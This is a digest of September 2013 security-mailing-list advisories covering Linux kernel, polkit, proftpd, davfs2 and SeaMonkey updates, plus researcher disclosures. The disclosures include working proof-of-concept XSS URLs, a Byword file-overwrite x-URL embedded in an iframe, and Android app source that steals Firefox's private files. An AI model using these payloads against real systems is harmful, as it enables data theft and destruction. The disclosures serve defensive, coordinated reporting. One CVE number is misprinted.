[SECURITY] [DSA 2766-1] linux-2.6 security update

2013-09-30 Thread dann frazier
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
Debian Security Advisory DSA-2766-1secur...@debian.org
http://www.debian.org/security/   Dann Frazier
September 27, 2013  http://www.debian.org/security/faq
- --

Package: linux-2.6
Vulnerability  : privilege escalation/denial of service/information leak
Problem type   : local/remote
Debian-specific: no
CVE Id(s)  : CVE-2013-2141 CVE-2013-2164 CVE-2013-2206 CVE-2013-2232
 CVE-2013-2234 CVE-2013-2237 CVE-2013-2239 CVE-2013-2851
 CVE-2013-2852 CVE-2013-2888 CVE-2013-2892

Several vulnerabilities have been discovered in the Linux kernel that may lead
to a denial of service, information leak or privilege escalation. The Common
Vulnerabilities and Exposures project identifies the following problems:

CVE-2013-2141

Emese Revfy provided a fix for an information leak in the tkill and
tgkill system calls. A local user on a 64-bit system maybe able to
gain access to sensitive memory contents.

CVE-2013-2164

Jonathan Salwan reported an information leak in the CD-ROM driver. A
local user on a system with a malfunctioning CD-ROM drive could gain
access to sensitive memory.

CVE-2013-2206

Karl Heiss reported an issue in the Linux SCTP implementation. A remote
user could cause a denial of service (system crash).

CVE-2013-2232

Dave Jones and Hannes Frederic Sowa resolved an issue in the IPv6
subsystem. Local users could cause a denial of service by using an
AF_INET6 socket to connect to an IPv4 destination.

CVE-2013-2234

Mathias Krause reported a memory leak in the implementation of PF_KEYv2
sockets. Local users could gain access to sensitive kernel memory.

CVE-2013-2237

Nicolas Dichtel reported a memory leak in the implementation of PF_KEYv2
sockets. Local users could gain access to sensitive kernel memory.

CVE-2013-2239

Jonathan Salwan discovered multiple memory leaks in the openvz kernel
flavor. Local users could gain access to sensitive kernel memory.

CVE-2013-2851

Kees Cook reported an issue in the block subsystem. Local users with
uid 0 could gain elevated ring 0 privileges. This is only a security
issue for certain specially configured systems.

CVE-2013-2852

Kees Cook reported an issue in the b43 network driver for certain Broadcom
wireless devices. Local users with uid 0 could gain elevated ring 0 
privileges. This is only a security issue for certain specially configured
systems.

CVE-2013-2888

Kees Cook reported an issue in the HID driver subsystem. A local user,
with the ability to attach a device, could cause a denial of service
(system crash).

CVE-2013-2892

Kees Cook reported an issue in the pantherlord HID device driver. Local
users with the ability to attach a device could cause a denial of service
or possibly gain elevated privileges.

For the oldstable distribution (squeeze), this problem has been fixed in
version 2.6.32-48squeeze4.

The following matrix lists additional source packages that were rebuilt for
compatibility with or to take advantage of this update:

 Debian 6.0 (squeeze)
 user-mode-linux 2.6.32-1um-4+48squeeze4

We recommend that you upgrade your linux-2.6 and user-mode-linux packages.

Note: Debian carefully tracks all known security issues across every
linux kernel package in all releases under active security support.
However, given the high frequency at which low-severity security
issues are discovered in the kernel and the resource requirements of
doing an update, updates for lower priority issues will normally not
be released for all kernels at the same time. Rather, they will be
released in a staggered or leap-frog fashion.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.14 (GNU/Linux)

iQIcBAEBAgAGBQJSRhLtAAoJEBv4PF5U/IZA18oP/jpZRZu3XXN7t4GOLeH94vgg
OyKwG+EyltAjYAq4XfCjUens5SfH8BylfXITpEkq2d2AWVI/K2fsuStpDbeHLtPo
p1+x3s1xQynxQLPrnqZlOqs58iHEnKF/A9NyJHu/rAO1iA24B8hcNGPTWEL6007Z
MWqJ0avaTXtgvOk/jRumR3qVlW0fskK5uS9lIVRX/S2WWQ2LPLwJ9URLV6YGeoi5
gyMGCMgkqiMQsGt4CTCoLjk26R/W70ed138088sZOMqHxaMlAImDClOMpnD9i/2g
XQ9mP0htmcyCdDB6I2H4QCQ6+YzAi424EL2j5b4ZX4NMjHs0sUYNfYWY/mRyg2kB
o6GI+ZRXl7N02nZw6ugFU/HTk7J2IVFbtYUf7KclJR74QkcKTSFxTOKZQp4ElZU2
gvdL4764JK8IfW0dk+jK7uzENWfu+U1JT8t+Ta8iuLKf+dx7BDT8uX9ebfSELJxo
5RX1OdmUcgIJsRxngPkr79QGIV13s1G/Af3dFqDGjCeOqlKS96OuatpkA45hwjEr
LSKoVRX63zePo8Ru7NH6OLNI37RGCxHOwGO5Xu0lOR7NAizQ2afvcDnKfAh7DV9D

[ MDVSA-2013:243 ] polkit

2013-09-30 Thread security
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2013:243
 http://www.mandriva.com/en/support/security/
 ___

 Package : polkit
 Date: September 27, 2013
 Affected: Business Server 1.0
 ___

 Problem Description:

 Updated polkit packages fix security vulnerability:
 
 A race condition was found in the way the PolicyKit pkcheck utility
 checked process authorization when the process was specified by its
 process ID via the --process option. A local user could use this
 flaw to bypass intended PolicyKit authorizations and escalate their
 privileges (CVE-2013-4288).
 
 Note: Applications that invoke pkcheck with the --process option need
 to be modified to use the pid,pid-start-time,uid argument for that
 option, to allow pkcheck to check process authorization correctly.
 
 Because of the change in the PolicyKit API, hplip (CVE-2013-4325),
 rtkit (CVE-2013-4326), and systemd (CVE-2013-4327) packages have
 been updated to use a different API that is not affected by this
 PolicyKit vulnerability.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4288
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4325
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4326
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4327
 https://bugs.mageia.org/show_bug.cgi?id=11260
 ___

 Updated Packages:

 Mandriva Business Server 1/X86_64:
 a505f84a730fe73329a47e34c63a7dbe  mbs1/x86_64/hplip-3.12.4-1.1.mbs1.x86_64.rpm
 3a4ba0c6f598df5d0a895e92d86bdee6  
mbs1/x86_64/hplip-doc-3.12.4-1.1.mbs1.x86_64.rpm
 5ff79b31c0d10f328cb3a33e73ee443f  
mbs1/x86_64/hplip-hpijs-3.12.4-1.1.mbs1.x86_64.rpm
 06ad03c60671fdc268f68c19abccdead  
mbs1/x86_64/hplip-hpijs-ppds-3.12.4-1.1.mbs1.x86_64.rpm
 464c910aa533f8a8bb2f2c3022127339  
mbs1/x86_64/hplip-model-data-3.12.4-1.1.mbs1.x86_64.rpm
 c868787d3990ecfdae81124e449b9fe5  
mbs1/x86_64/lib64hpip0-3.12.4-1.1.mbs1.x86_64.rpm
 16b802096b39e33c3c2e048e5034f6ee  
mbs1/x86_64/lib64hpip0-devel-3.12.4-1.1.mbs1.x86_64.rpm
 d9832f1d43a46d48de126d112744a63f  
mbs1/x86_64/lib64polkit1_0-0.104-6.1.mbs1.x86_64.rpm
 7cb376fc2241b8ef5d9fec5d56f8b44e  
mbs1/x86_64/lib64polkit1-devel-0.104-6.1.mbs1.x86_64.rpm
 6bd18537f831797178c8d8797ddb38c8  
mbs1/x86_64/lib64polkit-gir1.0-0.104-6.1.mbs1.x86_64.rpm
 bf1d4dfcde5c3268d93d3410686390cf  
mbs1/x86_64/lib64sane-hpaio1-3.12.4-1.1.mbs1.x86_64.rpm
 03c53c95ae85aa80d715eba6cb0a568e  
mbs1/x86_64/lib64systemd-daemon0-44-16.1.mbs1.x86_64.rpm
 3d652b24d8237db4354232c58da626f7  
mbs1/x86_64/lib64systemd-daemon0-devel-44-16.1.mbs1.x86_64.rpm
 720ca216bd163136e6157fae2ce3a8ce  
mbs1/x86_64/lib64systemd-id1280-44-16.1.mbs1.x86_64.rpm
 3dec561fc60e5670f775759d279b73f9  
mbs1/x86_64/lib64systemd-id1280-devel-44-16.1.mbs1.x86_64.rpm
 a5f09de0fe35f59d4f03c44d60706fc8  
mbs1/x86_64/lib64systemd-journal0-44-16.1.mbs1.x86_64.rpm
 1aa5d342f5e1ea17ad23a3adcb846b67  
mbs1/x86_64/lib64systemd-journal0-devel-44-16.1.mbs1.x86_64.rpm
 989d00585eda3757067bd7757760d21f  
mbs1/x86_64/lib64systemd-login0-44-16.1.mbs1.x86_64.rpm
 a64fbbeaf21c77c50bda1fff4278a34c  
mbs1/x86_64/lib64systemd-login0-devel-44-16.1.mbs1.x86_64.rpm
 03ba458caeb642419984d0984ea156b9  mbs1/x86_64/polkit-0.104-6.1.mbs1.x86_64.rpm
 f58526b0a6b7dd710d6ae50c401f3ca1  
mbs1/x86_64/polkit-desktop-policy-0.104-6.1.mbs1.noarch.rpm
 535391c9d869772e68cd13adac519113  mbs1/x86_64/rtkit-0.10-3.1.mbs1.x86_64.rpm
 867308654e786d01f4c66054cca07ab5  mbs1/x86_64/systemd-44-16.1.mbs1.x86_64.rpm
 52e155e8f9d39745da50bd8bcea8cd54  
mbs1/x86_64/systemd-sysvinit-44-16.1.mbs1.x86_64.rpm
 f71f9b8a5f1676bc3af636e510f9c7a8  
mbs1/x86_64/systemd-tools-44-16.1.mbs1.x86_64.rpm
 959a6d57120d110fc44178581105eb55  
mbs1/x86_64/systemd-units-44-16.1.mbs1.x86_64.rpm 
 119ee4665dda5c72402c2fdf7d6c5298  mbs1/SRPMS/hplip-3.12.4-1.1.mbs1.src.rpm
 f78ac8cf2fc3c60849ae806c1de0c4dd  mbs1/SRPMS/polkit-0.104-6.1.mbs1.src.rpm
 0af0c0abd85fc991c6592365cc93dd6e  mbs1/SRPMS/rtkit-0.10-3.1.mbs1.src.rpm
 3ac52aac654aaf3f3fefde1207e827e4  mbs1/SRPMS/systemd-44-16.1.mbs1.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/en/support/security/advisories/

 If you want to report 

[IBliss Security Advisory] Cross-site scripting ( XSS ) in PHP IDNA Convert

2013-09-30 Thread Alexandro Silva
[ PHP IDNA Convert Cross-site scripting ( XSS ) ]

[ Vendor product description]

PHP Net_IDNA is a class to convert between the Punycode and Unicode
formats. Punycode is a standard described in RFC 3492 and part of IDNA
(Internationalizing Domain Names in Applications [RFC3490]) . This class
allows PHP scripts to convert these domain names without having one of
the PHP extensions installed. It supports both IDNA 2003 and IDNA 2008.

[ Bug Description ]

Cross-site scripting (XSS) vulnerability in parameters encoded/decoded
in the class PHP IDNA Convert allows remote attackers to inject
arbitrary web script or HTML.

[ History ]

Advisory sent to vendor on 09/24/2013
Vendor reply on 09/25/2013
Vulnerability fixed on 09/26/2013

[ Impact ]

HIGH

[ Afected Version ]

0.8.0

[ Vendor Reply ]

Yes. Version 0.8.1 released

[ CVE Reference ]



[ PoC ]

Payloads:

http://[host]/idna_convert/index.php?decoded=94102%22%20onmouseover%3dprompt(929882)%20bad%3d%22encode=Encode%20idn_version=2003

http://[host]/idna_convert/example.php?decode=%20Decodeencoded=94102%22%20onmouseover%3dprompt(938200)%20bad%3d%22

http://[host]/index.php/%22onmouseover%3d%27prompt%28976724%29%27bad%3d%22%3E

[ References ]

[1] PHP IDNA Convert - http://phlymail.com/en/downloads/idna-convert.html

[2] Owasp Cross-site scripting -
https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)

[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/


iBliss Segurança e Inteligência - Sponsor: Alexandro Silva - Alexos

alexos (at) ibliss.com (dot) br [email concealed]


Linux Kernel Patches For Linux Kernel Security

2013-09-30 Thread geinblues
Hi forks!

I release an article for linux kernel security.
- http://www.x90c.org/articles/linux_kernel_patches.txt

x90c



[slackware-security] seamonkey (SSA:2013-271-01)

2013-09-30 Thread Slackware Security Team

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

[slackware-security]  seamonkey (SSA:2013-271-01)

New seamonkey packages are available for Slackware 14.0 and -current to
fix security issues.


Here are the details from the Slackware 14.0 ChangeLog:
+--+
patches/packages/seamonkey-2.21-i486-1_slack14.0.txz:  Upgraded.
  This update contains security fixes and improvements.
  For more information, see:
http://www.mozilla.org/security/known-vulnerabilities/seamonkey.html
  (* Security fix *)
patches/packages/seamonkey-solibs-2.21-i486-1_slack14.0.txz:  Upgraded.
+--+


Where to find the new packages:
+-+

Thanks to the friendly folks at the OSU Open Source Lab
(http://osuosl.org) for donating FTP and rsync hosting
to the Slackware project!  :-)

Also see the Get Slack section on http://slackware.com for
additional mirror sites near you.

Updated packages for Slackware 14.0:
ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/seamonkey-2.21-i486-1_slack14.0.txz
ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/seamonkey-solibs-2.21-i486-1_slack14.0.txz

Updated packages for Slackware x86_64 14.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/seamonkey-2.21-x86_64-1_slack14.0.txz
ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/seamonkey-solibs-2.21-x86_64-1_slack14.0.txz

Updated packages for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/seamonkey-solibs-2.21-i486-1.txz
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/seamonkey-2.21-i486-1.txz

Updated packages for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/seamonkey-solibs-2.21-x86_64-1.txz
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/seamonkey-2.21-x86_64-1.txz


MD5 signatures:
+-+

Slackware 14.0 packages:
ddb9d5b02abd2959e86dda85f3c99427  seamonkey-2.21-i486-1_slack14.0.txz
e5bfdbe2609579ad29c8ef265557cc82  seamonkey-solibs-2.21-i486-1_slack14.0.txz

Slackware x86_64 14.0 packages:
5bc6509907f5fac6294e00f6f3b8095f  seamonkey-2.21-x86_64-1_slack14.0.txz
46a11a3c8882227d9273ffb249532c11  seamonkey-solibs-2.21-x86_64-1_slack14.0.txz

Slackware -current packages:
d69931416f3e6b9c03839f67b825cc6a  l/seamonkey-solibs-2.21-i486-1.txz
0e77abc3c7bfa8e8eaeef9f084cdac8f  xap/seamonkey-2.21-i486-1.txz

Slackware x86_64 -current packages:
f59f929929100b76a654638f76da8e10  l/seamonkey-solibs-2.21-x86_64-1.txz
d0d5ce856e86b283154e64c279558a1b  xap/seamonkey-2.21-x86_64-1.txz


Installation instructions:
++

Upgrade the packages as root:
# upgradepkg seamonkey-2.21-i486-1_slack14.0.txz 
seamonkey-solibs-2.21-i486-1_slack14.0.txz 


+-+

Slackware Linux Security Team
http://slackware.com/gpg-key
secur...@slackware.com

++
| To leave the slackware-security mailing list:  |
++
| Send an email to majord...@slackware.com with this text in the body of |
| the email message: |
||
|   unsubscribe slackware-security   |
||
| You will get a confirmation message back containing instructions to|
| complete the process.  Please do not reply to this email address.  |
++
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.14 (GNU/Linux)

iEYEARECAAYFAlJHk1QACgkQakRjwEAQIjMALwCdEODgAGSbbA1ahL1cL/rs7lWo
6CUAn3l6MgVkdLgO78Idp1wOQM+IINFK
=OXUp
-END PGP SIGNATURE-


[SECURITY] [DSA 27671-1] proftpd-dfsg security update

2013-09-30 Thread Nico Golde
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

- -
Debian Security Advisory DSA-2767-1   secur...@debian.org
http://www.debian.org/security/Nico Golde
September 29, 2013 http://www.debian.org/security/faq
- -

Package: proftpd-dfsg
Vulnerability  : denial of service
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2013-4359
Debian Bug : 723179

Kingcope discovered that the mod_sftp and mod_sftp_pam modules of
proftpd, a powerful modular FTP/SFTP/FTPS server, are not properly
validating input, before making pool allocations. An attacker can
use this flaw to conduct denial of service attacks against the system
running proftpd (resource exhaustion).

For the oldstable distribution (squeeze), this problem has been fixed in
version 1.3.3a-6squeeze7.

For the stable distribution (wheezy), this problem has been fixed in
version 1.3.4a-5+deb7u1.

For the testing (jessie) unstable (sid) distributions, this problem will
be fixed soon.

We recommend that you upgrade your proftpd-dfsg packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.14 (GNU/Linux)

iQIcBAEBCgAGBQJSSETZAAoJEM1LKvOgoKqqLY0QAL6FDDkvW6Xgnenra8vic2OR
YCU0rSzN8eXcbuO3X1vUecUj7dcY8hrFcA0EgNTOK1x7GZHUXfFg5KpVj7/KBawL
V4d0glQEqBrsi+6b/MxNlHP7dvKLMVuRSVdf8tfRjsDBXNOVW303se4b9fyTNx3i
xAKkbfhDioM3uRfK+j49GhcxosuUE3blAKAB3oAX2BEMTbiGTbgniXfPiZEf2Vfe
1Hq4myEWK/Cd51Cw21+fZPC6sj3Xg5ffYUSZ7UakxednLvbHMnFIG1t9MLXEiAEx
/VFxjnExnztZTAx2cgBbqO+y5JXprHg1V5Q/B2EWzYcSJ/gSGXYnf33JUnaSMsik
rPv+/ubC+c0MuYtoi1z+lIzNyOTRr0IJn11C4/E8HRJi98fhWuLhxq8Qgtrh9HiM
E5sWvxQAEBp2BYI/3Rxn2gz4BuVzl/TLXdegGeS9CpxxqHYuoulFp43RtYhUTDmQ
34Y2x074Mx6zbabK4OociuXLdx2t8WAaU2x/D2tI97fc8RCRy7CJFIISKmPPL7Jx
xts13MYynwPIkrGihFSu2dYSmAz+Mqorczjbu1ZkBCFuOzPl1W/ibPe3VuhaVydK
t8i4Ak71UaQxSzClAXmZw/wUvsPZCEJrgS+Jwb9WFM+AzBUoLkdQMusNqhUD3X07
Cc6BpuMQzU+pMhDg6Xwl
=2l5u
-END PGP SIGNATURE-



[CVE-2013-5725] - Byword for iOS Data Destruction Vulnerability

2013-09-30 Thread guillaume
- Affected Vendor: http://metaclassy.com/
- Affected Software: Byword for iOS
- Affected Version: 2.x prior to 2.1
- Issue Type: Lack of validation/user confirmation leading to destruction of 
data
- Release Date: 29 Sept 2013
- Discovered by: Guillaume Ross 
- CVE Identifier: CVE-2013-5725
- Issue Status: Vendor has published version 2.1 which adds a confirmation 
prompt to prevent the issue.

**Summary**

Byword is a text editor for iOS and OS X that can use iCloud or Dropbox to sync 
documents. 

Byword supports actions through X-URLs on iOS.
One of the supported action replaces a file with the value passed through the 
URL.

**Description**

The Replace file action in the affected version does not warn the user and 
replaces the content of the target file with text specified in the X-URL.

The attacker must know the path to the file, but considering iCloud does not 
have subfolders, it makes it easier to guess filenames such as todo.txt file 
or an important.txt file, or the attacker could have received a file created 
by the victim using Byword and  can guess the filename from the title. 

**Impact**

The file can be overwritten and the data could be lost permanently.

**Proof of Concept**

byword://replace?location=icloudpath=name=Important.txttext=haha

This URL would replace the content of the file Important.txt in the user's 
iCloud container for Byword with haha. By using iframes, the attacker can 
embed this attack in a web page. Safari on iOS will automatically launch Byword 
and overwrite the file.

iframe 
src=byword://replace?location=icloudpath=name=Important.txttext=haha/iframe

**Response Timeline**

- August 26 2013 - Vendor notified
- August 26 2013 - Vendor acknowledges vulnerability
- September 18 2013 - Update released that adds a warning/confirmation screen
- September 29 2013 - Advisory released


Firefox for Android - Same-origin bypass through symbolic links

2013-09-30 Thread Takeshi Terada
CVE Number: CVE-2013-1727
Vender Identifier:  MFSA 2013-84
Title:  Firefox for Android - Same-origin bypass through
symbolic links
Affected Software:  Prior to v24 (confirmed on v14)
Credit: Takeshi Terada of Mitsui Bussan Secure Directions, Inc.
Issue Status:   v24 was released which fixes this vulnerability

Overview:
  Firefox for Android's Same-Origin Policy for local files (file: URI) can
  be bypassed by using symbolic links. It results in theft of Firefox's
  private files by malicious Android apps.

Details:
  As described in MDN Document (*), Firefox allows a local file to read
  another file, only if the parent directory of the originating file is an
  ancestor directory of the target file.

  * https://developer.mozilla.org/en-US/docs/Same-origin_policy_for_file:_URIs

  However, it is possible to circumvent the restriction by a trick using
  symbolic link.

  This issue enables malicious Android apps to steal Firefox's private
  files such as Cookie file.

  As an example, steps to steal Firefox's profiles.ini are described below:

  1. An attacker's app creates a malicious HTML file, and makes Firefox load
 its URL with file scheme. The malicious HTML contains JavaScript code
 which, a few seconds later, tries to read the same URL with itself via
 XMLHttpRequest.

 uWait a few seconds./u
 script
 function doit() {
 var xhr = new XMLHttpRequest;
 xhr.onload = function() {
 alert(xhr.responseText);
 };
 xhr.open('GET', document.URL);
 xhr.send(null);
 }
 setTimeout(doit, 8000);
 /script;

  2. Before XHR fires, the attacker's app replaces the malicious HTML with
 a symbolic link pointing to Firefox's profiles.ini file.

  3. When XHR fires, Firefox follows the symlink and provides the content
 of the profiles.ini file to the malicious HTML.

  Through the steps above, the attacker's app can gain the path of the
  Firefox's private files such as Cookie file. The attacker's app can also
  get the contents of those private files in a similar manner.

Note:
  It should be noted that this issue does not matter in Firefox for normal
  PC platform (such as Windows OS), in which all apps are regarded as
  reasonably trustworthy. However it does matter in Android platform with
  sandbox security model intended to segretate apps. In such platforms,
  app developers cannot regard other apps as trustworty.

  By this difference in platform security model, Android apps that are
  ported from PC often suffer from unexpected vulnerabilities. Obviously
  such vulnerabilities are not specific to Firefox. In reality, I
  discovered such vulnerabilities in Chrome for Android last year.

  Chrome for Android vulnerabilities:
  1. http://seclists.org/bugtraq/2013/Jan/22
  2. http://seclists.org/bugtraq/2013/Jan/23
  3. http://seclists.org/bugtraq/2013/Jan/24
  4. http://seclists.org/bugtraq/2013/Jan/25
  5. http://seclists.org/bugtraq/2013/Jan/26

  (#4 is a quite similar issue as the issue described in this advisory)

Proof of Concept:
  /
  // malicious android app that steals Firefox's profiles.ini file
  /
  package jp.mbsd.terada.attackfirefox1;

  import android.net.Uri;
  import android.os.Bundle;
  import android.app.Activity;
  import android.content.Intent;

  public class MainActivity extends Activity {
  public final static String MY_PKG =
  jp.mbsd.terada.attackfirefox1;

  public final static String MY_TMP_DIR =
  /data/data/ + MY_PKG + /tmp/;

  public final static String HTML_PATH =
  MY_TMP_DIR + A + Math.random() + .html;

  public final static String TARGET_PKG =
  org.mozilla.firefox;

  public final static String TARGET_FILE_PATH =
  /data/data/ + TARGET_PKG + /files/mozilla/profiles.ini;

  public final static String HTML =
  uWait a few seconds./u +
  script +
  function doit() { +
  var xhr = new XMLHttpRequest; +
  xhr.onload = function() { +
  alert(xhr.responseText); +
  }; +
  xhr.open('GET', document.URL); +
  xhr.send(null); +
  } +
  setTimeout(doit, 8000); +
  /script;

  @Override
  public void onCreate(Bundle savedInstanceState) {
  super.onCreate(savedInstanceState);
  setContentView(R.layout.activity_main);
  doit();
  }

  public void doit() {
  try {
  // create a malicious HTML
  cmdexec(mkdir  + MY_TMP_DIR);
  cmdexec(echo \ + HTML + \   + HTML_PATH);
  cmdexec(chmod -R 777  + MY_TMP_DIR);

  Thread.sleep(1000);

  // force Firefox to load the malicious HTML
  invokeFirefox(file:// + HTML_PATH);

   

Open-Xchange Security Advisory 2013-09-30

2013-09-30 Thread Martin Braun
Product: Open-Xchange AppSuite
Vendor: Open-Xchange GmbH

Internal reference: 28642 (Bug ID)
Vulnerability type:  CWE-80 (Improper Neutralization of Script-Related HTML 
Tags in a Web Page)
Vulnerable version: prior to 7.2.2
Vulnerable component: backend
Fixed version: 7.0.2-rev16, 7.2.2-rev20
Report confidence: Confirmed
Solution status: Fixed by Vendor
Vendor notification: 2013-09-02
Solution date: 2013-09-12
Public disclosure: 2013-09-30
CVE reference: CVE-2013-5690
CVSSv2: 5.7 
(AV:N/AC:L/Au:S/C:N/I:P/A:N/E:F/RL:U/RC:C/CDP:LM/TD:H/CR:ND/IR:ND/AR:ND)

Vulnerability Details:
File contents are sanitized to avoid script execution be rogue content. For 
performance reasons, the sanitation takes place for requests where the MIME 
type indicates that the content will be displayed/executed within the browser 
context. While the most commonly used MIME-types are covered (text/html), some 
browsers also execute script code within files signalled with text/xml 
MIME-type.

Risk:
Malicious script code can be executed within a users context. This can lead to 
session hijacking or triggering unwanted actions via the web interface (sending 
mail, deleting data etc.)

Solution:
Users should update to the latest available patch releases.


Internal reference: 28635 (Bug ID)
Vulnerability type:  CWE-80 (Improper Neutralization of Script-Related HTML 
Tags in a Web Page)
Vulnerable version: prior to 7.2.2
Vulnerable component: backend
Fixed version: 7.0.2-rev16, 7.2.2-rev20
Report confidence: Confirmed
Solution status: Fixed by Vendor
Vendor notification: 2013-09-02
Solution date: 2013-09-12
Public disclosure: 2013-09-30
CVE reference: CVE-2013-5690
CVSSv2: 5.7 
(AV:N/AC:L/Au:S/C:N/I:P/A:N/E:F/RL:U/RC:C/CDP:LM/TD:H/CR:ND/IR:ND/AR:ND)

Vulnerability Details:
Entering script code to an appointments Status comment field is possible and 
not sanitized. The script code is executed when printing the appointment.

Risk:
Malicious script code can be executed within a users context. This can lead to 
session hijacking or triggering unwanted actions via the web interface (sending 
mail, deleting data etc.)

Solution:
Users should update to the latest available patch releases.



Internal reference: 28538 (Bug ID)
Vulnerability type:  CWE-113 (Improper Neutralization of CRLF Sequences in HTTP 
Headers) aka 'HTTP Response Splitting'
Vulnerable version: prior to 7.2.2
Vulnerable component: backend
Fixed version: 7.0.2-rev16, 7.2.2-rev20
Report confidence: Confirmed
Solution status: Fixed by Vendor
Vendor notification: 2013-08-27
Solution date: 2013-09-12
Public disclosure: 2013-09-30
CVE reference: CVE-2013-5690
CVSSv2: 5.7 
(AV:N/AC:L/Au:S/C:N/I:P/A:N/E:F/RL:U/RC:C/CDP:LM/TD:H/CR:ND/IR:ND/AR:ND)

Vulnerability Details:
It's possible to use the /ajax/defer servlet to create malicious HTTP responses 
by injecting crafted HTTP headers. This issue occurs when using AJP as a 
backend connector to OX while HTTP based connectors return an error message for 
that request.

Risk:
A user may be tricked to open a link pointing to a trusted URL. However, by 
crafting malicious parameters to this request, it's possible to inject HTTP 
headers. These may be used to redirect the user to an unexpected website or 
offer unsolicited content in the context of a trusted domain.

Solution:
Users should update to the latest available patch releases.


[ MDVSA-2013:244 ] davfs2

2013-09-30 Thread security
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2013:244
 http://www.mandriva.com/en/support/security/
 ___

 Package : davfs2
 Date: September 30, 2013
 Affected: Business Server 1.0, Enterprise Server 5.0
 ___

 Problem Description:

 A vulnerability has been discovered and corrected in davfs2:
 
 Davfs2, a filesystem client for WebDAV, calls the function system()
 insecurely while is setuid root. This might allow a privilege
 escalation (CVE-2013-4362).
 
 The updated packages have been patched to correct this issue.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4362
 http://www.debian.org/security/2013/dsa-2765
 ___

 Updated Packages:

 Mandriva Enterprise Server 5:
 f0853a536a00aa39b994df01dade61c5  mes5/i586/davfs2-1.3.3-1.1mdvmes5.2.i586.rpm 
 0b7bf41ff10ccfed01f0cd050cd1eb36  mes5/SRPMS/davfs2-1.3.3-1.1mdvmes5.2.src.rpm

 Mandriva Enterprise Server 5/X86_64:
 aad5a3a3e974b458b3088a34c15daffb  
mes5/x86_64/davfs2-1.3.3-1.1mdvmes5.2.x86_64.rpm 
 0b7bf41ff10ccfed01f0cd050cd1eb36  mes5/SRPMS/davfs2-1.3.3-1.1mdvmes5.2.src.rpm

 Mandriva Business Server 1/X86_64:
 cf2712a4255fe5b908fc516ac392ee08  mbs1/x86_64/davfs2-1.4.6-2.1.mbs1.x86_64.rpm 
 1870bfd952eeb78a7ed655c87e7b1b2e  mbs1/SRPMS/davfs2-1.4.6-2.1.mbs1.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/en/support/security/advisories/

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  security*mandriva.com
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.12 (GNU/Linux)

iD8DBQFSSUoTmqjQ0CJFipgRAtYVAKCTY47LexjDiIuYnAvpRiHsZysiNQCgycRi
IwTuT7yEkUtCutNRRSoleGk=
=yR1B
-END PGP SIGNATURE-



CVE-2130-5680, HylaFAX+ heap overflow, unchecked network traffic.

2013-09-30 Thread Dennis Jenkins
Details
===
Application: HylaFAX+
Version: 5.2.4 (April, 2008) through 5.5.3 (August 6, 2013)
Type: Daemon that manages a fax server via an FTP-like protocol.
Vendor / Maintainer: Lee Howard (faxguy _at_ howardsilvan.com)
Project Homepage: http://hylafax.sourceforge.net/
Vulnerability: CWE-120: Classic buffer overflow from unchecked network
traffic, resulting in heap corruption.
Vulnerability Discoverer: Dennis Jenkins (dennis.jenkins.75 _at_ gmail.com)
CVE reference: CVE-2130-5680, 2013-09-03
Solution Status: Fixed by vendor.


Description
===
HylaFAX™ is an enterprise-class open-source system for sending and
receiving facsimiles as well as for sending alpha-numeric pages.


Vulnerability
===
HylaFAX+ contains a daemon, hfaxd, that allows a fax client to
communicate with the fax server to submit fax jobs, query status,
configure modems, etc...  The underlying wire protocol is a super-set
of classic FTP.  hfaxd can be compiled with support for
authenticating users via LDAP, although usually, one just configured
hfaxd to use PAM.  The code path for authenticating users via LDAP
allocates a 255-byte buffer (via the C++ new operator), and then
strcats user-supplied data buffered from the inbound FTP control
channel.  Other code limits the amount of copied data to 506 bytes,
and truncates on NULL and \n.  Thus it is possible for an
UNAUTHENTICATED remote attacker to overflow the heap with a limited
